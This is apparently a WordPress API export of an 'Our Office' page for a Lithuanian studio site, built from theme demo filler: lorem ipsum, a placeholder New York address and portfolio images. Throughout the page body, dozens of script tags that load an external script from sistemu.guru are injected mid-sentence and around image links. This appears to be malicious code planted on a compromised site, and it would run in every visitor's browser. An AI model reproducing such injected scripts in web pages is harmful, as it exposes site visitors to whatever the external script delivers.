{"id":3496,"date":"2013-04-04T15:18:43","date_gmt":"2013-04-04T15:18:43","guid":{"rendered":"http:\/\/avada.theme-fusion.comxml\/?page_id=3496"},"modified":"2019-03-07T07:48:46","modified_gmt":"2019-03-07T09:48:46","slug":"our-office","status":"publish","type":"page","link":"http:\/\/www.menustudija.lt\/lt\/our-office\/","title":{"rendered":"Our Office"},"content":{"rendered":"<div class=\"fusion-fullwidth fullwidth-box hundred-percent-fullwidth non-hundred-percent-height-scrolling\"  style='background-color: #ffffff;background-position: center center;background-repeat: no-repeat;padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;'><div class=\"fusion-builder-row fusion-row \"><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-builder-column-1 fusion-one-full fusion-column-first fusion-column-last fusion-column-no-min-height 1_1\"  style='margin-top:0px;margin-bottom:0px;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-slider-sc fusion-flexslider-loading flexslider flexslider-hover-type-none\" style=\"max-width:100%;height:100%;\"><ul class=\"slides\"><li class=\"image\"><span class=\"fusion-image-hover-element hover-type-none\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg\" width=\"940\" height=\"600\" \/><\/span><\/li><li class=\"image\"><span class=\"fusion-image-hover-element hover-type-none\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_5.jpg\" width=\"940\" height=\"600\" \/><\/span><\/li><\/ul><\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_2_3 fusion-builder-column-2 fusion-two-third fusion-column-first 2_3\"  style='margin-top:0px;margin-bottom:20px;width:66.66%;width:calc(66.66% - ( ( 4% ) * 0.6666 ) );margin-right: 4%;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-title title fusion-title-1 fusion-title-size-two\" style=\"margin-top:0px;margin-bottom:30px;\"><h2 class=\"title-heading-left\" style=\"margin:0;\">We Love To Work &amp; We Love Where We Work<\/h2><div class=\"title-sep-container\"><div class=\"title-sep sep-double sep-solid\" style=\"border-color:#e0dede;\"><\/div><\/div><\/div><div class=\"fusion-text\"><p>Lid est laborum dolo rumes fugats untras. Etharums ser quidem rerum facilis dolores nemis omnis fugats vitaes nemo minima rerums unsers sadips amets. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui.\u00a0Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Ratione voluptatem sequi nesciunt. Asunt in anim uis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Asunt in anim uis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla. <strong><em> Avada is the perfect choice for your business. It&#8217;s loaded with features, options &amp; page layouts. Plus we have the best customer support around, but dont take our word for it, <script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><a href=\"http:\/\/avadatest.theme-fusion.com\/user-reviews\/\">ask our amazing users!<\/a><\/em><\/strong><\/p>\n<\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_3 fusion-builder-column-3 fusion-one-third fusion-column-last 1_3\"  style='margin-top:0px;margin-bottom:20px;width:33.33%;width:calc(33.33% - ( ( 4% ) * 0.3333 ) );'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-title title fusion-title-2 fusion-title-size-two\" style=\"margin-top:0px;margin-bottom:30px;\"><h2 class=\"title-heading-left\" style=\"margin:0;\">Our Location<\/h2><div class=\"title-sep-container\"><div class=\"title-sep sep-double sep-solid\" style=\"border-color:#e0dede;\"><\/div><\/div><\/div>\t\t\t\t\t<script type=\"text\/javascript\">\n\t\t\t\t\t\tvar map_fusion_map_69f59793ae697;\n\t\t\t\t\t\tvar markers = [];\n\t\t\t\t\t\tvar counter = 0;\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tvar fusionMapNonce = '336fd3dd88';\n\t\t\t\t\t\t\t\t\t\t\t\tfunction fusion_run_map_fusion_map_69f59793ae697() {\n\t\t\t\t\t\t\tjQuery('#fusion_map_69f59793ae697').fusion_maps({\n\t\t\t\t\t\t\t\taddresses: [{\"address\":\"775 E New York Ave\\u200e Brooklyn, NY 11203\",\"infobox_content\":\"775 E New York Ave\\u200e Brooklyn, NY 11203\",\"coordinates\":false,\"cache\":false}],\n\t\t\t\t\t\t\t\tanimations: false,\n\t\t\t\t\t\t\t\tinfobox_background_color: '',\n\t\t\t\t\t\t\t\tinfobox_styling: 'default',\n\t\t\t\t\t\t\t\tinfobox_text_color: '',\n\t\t\t\t\t\t\t\tmap_style: 'default',\n\t\t\t\t\t\t\t\tmap_type: 'terrain',\n\t\t\t\t\t\t\t\tmarker_icon: '',\n\t\t\t\t\t\t\t\toverlay_color: '',\n\t\t\t\t\t\t\t\toverlay_color_hsl: {\"hue\":0,\"sat\":0,\"lum\":100},\n\t\t\t\t\t\t\t\tpan_control: true,\n\t\t\t\t\t\t\t\tshow_address: true,\n\t\t\t\t\t\t\t\tscale_control: true,\n\t\t\t\t\t\t\t\tscrollwheel: true,\n\t\t\t\t\t\t\t\tzoom: 14,\n\t\t\t\t\t\t\t\tzoom_control: true,\n\t\t\t\t\t\t\t});\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tgoogle.maps.event.addDomListener(window, 'load', fusion_run_map_fusion_map_69f59793ae697);\n\t\t\t\t\t<\/script>\n\t\t\t\t\t<div class=\"shortcode-map fusion-google-map fusion-maps-js-type\" id=\"fusion_map_69f59793ae697\" style=\"height:180px;width:100%;\"><\/div><div class=\"fusion-text\"><h4>Located In Beautiful New York City<\/h4>\n<p>12345 Main Street, New York, NY 02781 Phone: 1.800.555.6789 Web: <script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><a href=\"http:\/\/themeforest.net\/user\/ThemeFusion\">www.yoursite.com<\/a><\/p>\n<\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-builder-column-4 fusion-one-full fusion-column-first fusion-column-last fusion-column-no-min-height 1_1\"  style='margin-top:0px;margin-bottom:0px;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-sep-clear\"><\/div><div class=\"fusion-separator fusion-full-width-sep sep-none\" style=\"margin-left: auto;margin-right: auto;margin-top:15px;margin-bottom:15px;\"><\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-builder-column-5 fusion-one-full fusion-column-first fusion-column-last fusion-column-no-min-height 1_1\"  style='margin-top:0px;margin-bottom:0px;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-title title fusion-title-3 fusion-title-size-two\" style=\"margin-top:0px;margin-bottom:30px;\"><h2 class=\"title-heading-left\" style=\"margin:0;\">Images Of Our Workplace<\/h2><div class=\"title-sep-container\"><div class=\"title-sep sep-double sep-solid\" style=\"border-color:#e0dede;\"><\/div><\/div><\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_4 fusion-builder-column-6 fusion-one-fourth fusion-column-first 1_4\"  style='margin-top:0px;margin-bottom:20px;width:25%;width:calc(25% - ( ( 4% + 4% + 4% ) * 0.25 ) );margin-right: 4%;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-text\"><p><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><a href=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg\" rel=\"prettyPhoto\"><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><img decoding=\"async\" src=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg\" alt=\"image 1\" \/><\/a><\/p>\n<\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_4 fusion-builder-column-7 fusion-one-fourth 1_4\"  style='margin-top:0px;margin-bottom:20px;width:25%;width:calc(25% - ( ( 4% + 4% + 4% ) * 0.25 ) );margin-right: 4%;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-text\"><p><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><a href=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_5.jpg\" rel=\"prettyPhoto\"><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><img decoding=\"async\" src=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_5.jpg\" alt=\"image 1\" \/><\/a><\/p>\n<\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_4 fusion-builder-column-8 fusion-one-fourth 1_4\"  style='margin-top:0px;margin-bottom:20px;width:25%;width:calc(25% - ( ( 4% + 4% + 4% ) * 0.25 ) );margin-right: 4%;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-text\"><p><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><a href=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2013\/10\/portfolio_6.jpg\" rel=\"prettyPhoto\"><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><img decoding=\"async\" src=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2013\/10\/portfolio_6.jpg\" alt=\"image 1\" \/><\/a><\/p>\n<\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_4 fusion-builder-column-9 fusion-one-fourth fusion-column-last 1_4\"  style='margin-top:0px;margin-bottom:20px;width:25%;width:calc(25% - ( ( 4% + 4% + 4% ) * 0.25 ) );'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-text\"><p><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><a href=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg\" rel=\"prettyPhoto\"><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><img decoding=\"async\" src=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg\" alt=\"image 1\" \/><\/a><\/p>\n<\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><\/div><\/div>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":6,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-3496","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Our Office - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/www.menustudija.lt\/lt\/our-office\/\" \/>\n<meta property=\"og:locale\" content=\"lt_LT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Our Office - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\" \/>\n<meta property=\"og:url\" content=\"http:\/\/www.menustudija.lt\/lt\/our-office\/\" \/>\n<meta property=\"og:site_name\" content=\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\" \/>\n<meta property=\"article:modified_time\" content=\"2019-03-07T09:48:46+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minut\u0117s\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/our-office\/\",\"url\":\"http:\/\/www.menustudija.lt\/lt\/our-office\/\",\"name\":\"Our Office - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\",\"isPartOf\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#website\"},\"primaryImageOfPage\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/our-office\/#primaryimage\"},\"image\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/our-office\/#primaryimage\"},\"thumbnailUrl\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg\",\"datePublished\":\"2013-04-04T15:18:43+00:00\",\"dateModified\":\"2019-03-07T09:48:46+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/our-office\/#breadcrumb\"},\"inLanguage\":\"lt-LT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/www.menustudija.lt\/lt\/our-office\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"lt-LT\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/our-office\/#primaryimage\",\"url\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg\",\"contentUrl\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/our-office\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"http:\/\/www.menustudija.lt\/lt\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Our Office\"}]},{\"@type\":\"WebSite\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#website\",\"url\":\"http:\/\/www.menustudija.lt\/lt\/\",\"name\":\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\",\"description\":\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija - mintims, sielai, k\u016bnui\",\"publisher\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/www.menustudija.lt\/lt\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"lt-LT\"},{\"@type\":\"Organization\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#organization\",\"name\":\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\",\"url\":\"http:\/\/www.menustudija.lt\/lt\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"lt-LT\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#\/schema\/logo\/image\/\",\"url\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2019\/08\/cropped-RBMS-logo-2-page-001-scaled.jpg\",\"contentUrl\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2019\/08\/cropped-RBMS-logo-2-page-001-scaled.jpg\",\"width\":2560,\"height\":768,\"caption\":\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\"},\"image\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#\/schema\/logo\/image\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Our Office - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/www.menustudija.lt\/lt\/our-office\/","og_locale":"lt_LT","og_type":"article","og_title":"Our Office - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","og_url":"http:\/\/www.menustudija.lt\/lt\/our-office\/","og_site_name":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","article_modified_time":"2019-03-07T09:48:46+00:00","og_image":[{"url":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg","type":"","width":"","height":""}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"3 minut\u0117s"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"http:\/\/www.menustudija.lt\/lt\/our-office\/","url":"http:\/\/www.menustudija.lt\/lt\/our-office\/","name":"Our Office - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","isPartOf":{"@id":"http:\/\/www.menustudija.lt\/lt\/#website"},"primaryImageOfPage":{"@id":"http:\/\/www.menustudija.lt\/lt\/our-office\/#primaryimage"},"image":{"@id":"http:\/\/www.menustudija.lt\/lt\/our-office\/#primaryimage"},"thumbnailUrl":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg","datePublished":"2013-04-04T15:18:43+00:00","dateModified":"2019-03-07T09:48:46+00:00","breadcrumb":{"@id":"http:\/\/www.menustudija.lt\/lt\/our-office\/#breadcrumb"},"inLanguage":"lt-LT","potentialAction":[{"@type":"ReadAction","target":["http:\/\/www.menustudija.lt\/lt\/our-office\/"]}]},{"@type":"ImageObject","inLanguage":"lt-LT","@id":"http:\/\/www.menustudija.lt\/lt\/our-office\/#primaryimage","url":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg","contentUrl":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg"},{"@type":"BreadcrumbList","@id":"http:\/\/www.menustudija.lt\/lt\/our-office\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"http:\/\/www.menustudija.lt\/lt\/"},{"@type":"ListItem","position":2,"name":"Our Office"}]},{"@type":"WebSite","@id":"http:\/\/www.menustudija.lt\/lt\/#website","url":"http:\/\/www.menustudija.lt\/lt\/","name":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","description":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija - mintims, sielai, k\u016bnui","publisher":{"@id":"http:\/\/www.menustudija.lt\/lt\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/www.menustudija.lt\/lt\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"lt-LT"},{"@type":"Organization","@id":"http:\/\/www.menustudija.lt\/lt\/#organization","name":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","url":"http:\/\/www.menustudija.lt\/lt\/","logo":{"@type":"ImageObject","inLanguage":"lt-LT","@id":"http:\/\/www.menustudija.lt\/lt\/#\/schema\/logo\/image\/","url":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2019\/08\/cropped-RBMS-logo-2-page-001-scaled.jpg","contentUrl":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2019\/08\/cropped-RBMS-logo-2-page-001-scaled.jpg","width":2560,"height":768,"caption":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija"},"image":{"@id":"http:\/\/www.menustudija.lt\/lt\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/pages\/3496","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/comments?post=3496"}],"version-history":[{"count":1,"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/pages\/3496\/revisions"}],"predecessor-version":[{"id":19482,"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/pages\/3496\/revisions\/19482"}],"wp:attachment":[{"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/media?parent=3496"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}